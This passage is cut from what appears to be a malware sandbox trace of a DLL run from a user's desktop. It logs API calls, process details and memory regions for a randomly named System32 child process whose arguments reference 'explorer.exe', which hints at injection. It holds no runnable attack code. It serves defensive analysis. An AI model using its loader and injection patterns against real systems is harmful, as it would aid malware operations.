lpProcName="strstr") returned 0x7772de4a [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.877] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.877] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.877] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.877] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.877] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.877] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.877] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.877] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.877] AddAtomS () returned 0x0 [0034.879] HeapDestroy (hHeap=0x1f0000) returned 1 Process: id = "51" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2257 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2258 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2259 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2260 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2261 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2262 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2263 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2264 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2265 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2266 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2267 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2268 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2269 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2270 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2271 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2272 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2273 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2274 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2275 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2276 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2277 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2278 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2279 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2280 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2281 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2282 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2283 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2284 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2285 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2286 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2287 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2288 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2289 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2290 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2291 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2292 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2293 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2294 start_va = 0x2b0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 2295 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2296 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2297 start_va = 0x5e0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Thread: id = 108 os_tid = 0xce4 [0034.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f4b4 | out: lpSystemTimeAsFileTime=0x16f4b4*(dwLowDateTime=0xe2822f10, dwHighDateTime=0x1d3dfba)) [0034.928] GetCurrentProcessId () returned 0xce0 [0034.928] GetCurrentThreadId () returned 0xce4 [0034.928] GetTickCount () returned 0x17dc6 [0034.928] QueryPerformanceCounter (in: lpPerformanceCount=0x16f4ac | out: lpPerformanceCount=0x16f4ac*=372569557) returned 1 [0034.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.929] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.929] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.929] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.929] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.929] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.930] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.930] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.930] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.930] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.930] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.930] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.930] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.931] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.931] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.931] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.931] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.931] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.931] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.932] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.932] GetCurrentThreadId () returned 0xce4 [0034.932] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"explorer.exe\"" [0034.932] GetEnvironmentStringsW () returned 0x3678f0* [0034.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3009f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.932] FreeEnvironmentStringsW (penv=0x3678f0) returned 1 [0034.932] GetStartupInfoA (in: lpStartupInfo=0x16f404 | out: lpStartupInfo=0x16f404*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.932] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.932] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.932] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.933] SetHandleCount (uNumber=0x20) returned 0x20 [0034.933] GetLastError () returned 0x0 [0034.933] SetLastError (dwErrCode=0x0) [0034.933] GetLastError () returned 0x0 [0034.933] SetLastError (dwErrCode=0x0) [0034.933] GetLastError () returned 0x0 [0034.933] SetLastError (dwErrCode=0x0) [0034.933] GetACP () returned 0x4e4 [0034.933] GetLastError () returned 0x0 [0034.933] SetLastError (dwErrCode=0x0) [0034.933] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.933] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f3e4 | out: lpCPInfo=0x16f3e4) returned 1 [0034.933] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16eeb0 | out: lpCPInfo=0x16eeb0) returned 1 [0034.933] GetLastError () returned 0x0 [0034.933] SetLastError (dwErrCode=0x0) [0034.933] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16ee40 | out: lpCharType=0x16ee40) returned 1 [0034.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2c4, cbMultiByte=256, lpWideCharStr=0x16ec28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.933] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x16eec4 | out: lpCharType=0x16eec4) returned 1 [0034.933] GetLastError () returned 0x0 [0034.933] SetLastError (dwErrCode=0x0) [0034.933] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2c4, cbMultiByte=256, lpWideCharStr=0x16ebf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᒨ矲狰Ā") returned 256 [0034.933] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᒨ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.934] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᒨ矲狰Ā", cchSrc=256, lpDestStr=0x16e9e8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f1c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿõÐgôüó\x16", lpUsedDefaultChar=0x0) returned 256 [0034.934] GetLastError () returned 0x0 [0034.934] SetLastError (dwErrCode=0x0) [0034.934] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.934] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2c4, cbMultiByte=256, lpWideCharStr=0x16ec18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᒨ矲狰Ā") returned 256 [0034.934] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᒨ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.934] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᒨ矲狰Ā", cchSrc=256, lpDestStr=0x16ea08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 